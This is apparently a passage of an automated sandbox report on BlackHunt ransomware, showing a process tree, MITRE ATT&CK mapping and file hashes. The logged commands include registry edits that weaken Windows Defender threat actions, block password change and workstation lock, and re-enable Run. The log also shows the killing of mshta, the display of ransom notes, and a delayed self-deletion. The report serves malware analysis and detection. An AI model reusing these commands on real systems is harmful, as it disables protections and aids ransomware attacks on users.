C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14240
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:9504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:14308
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:13244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:7324 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:6468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 14444⤵
- Program crash
PID:16172
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:9256
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:6252
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe"2⤵PID:3292
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5312
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2340
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:2692
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2196
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2832
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6912
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:30116
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13904
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:25868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6468 -ip 64681⤵PID:8024
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c1ca9d169a691d48286ff2ba5c273dba
SHA15e511621d2fdd6143ae021b91d0930b9618c4fb3
SHA2563375608d682c2b1dad3019d70dea56e711a438b56b093c1689bc5f788811cb5f
SHA512783df80e956ff5f13f4377f2f12c0dcc4b795d33130db8a48c9a37de34a6c553969c95c13d98fa0c889e3252c1bfb5b9be108ed74ea6020a558dd18dad631ccf
-
Filesize
12KB
MD58580b4000c02f81d4e636e8c221d6231
SHA1a801d1fc4bd2a43e250f19e734a509f024fc0b7e
SHA256354fbbe7b11afb2d76a906414d53ed4b99fe242c6fbac37be0a02674072d282f
SHA512b99b6f6ef4d8d55808c5429e7e6950cf3e35a78ed7ea1f97717250be3db27f92abae901f3b01a5a2e7d8453e7bd7edb1acbbd35b1c22be1a88c4ecabbd410d58
-
Filesize
684B
MD52b0fda6d70fbdabee5911abba9757bcf
SHA170a8422a9e14f5a0aadd3fa51606cb7bfd1e4295
SHA2567357bd145f6b7726c75635e2fc93af3bedbd16a01924cd5899472bbb71af7f58
SHA51267db8c99f8732dff9fc25462b7151a490fbe83875b74b1fe29c9094d760cc3246beaad74e172d72376103c6a49d5c72d3fd4181ecf3adb57b3146175299db456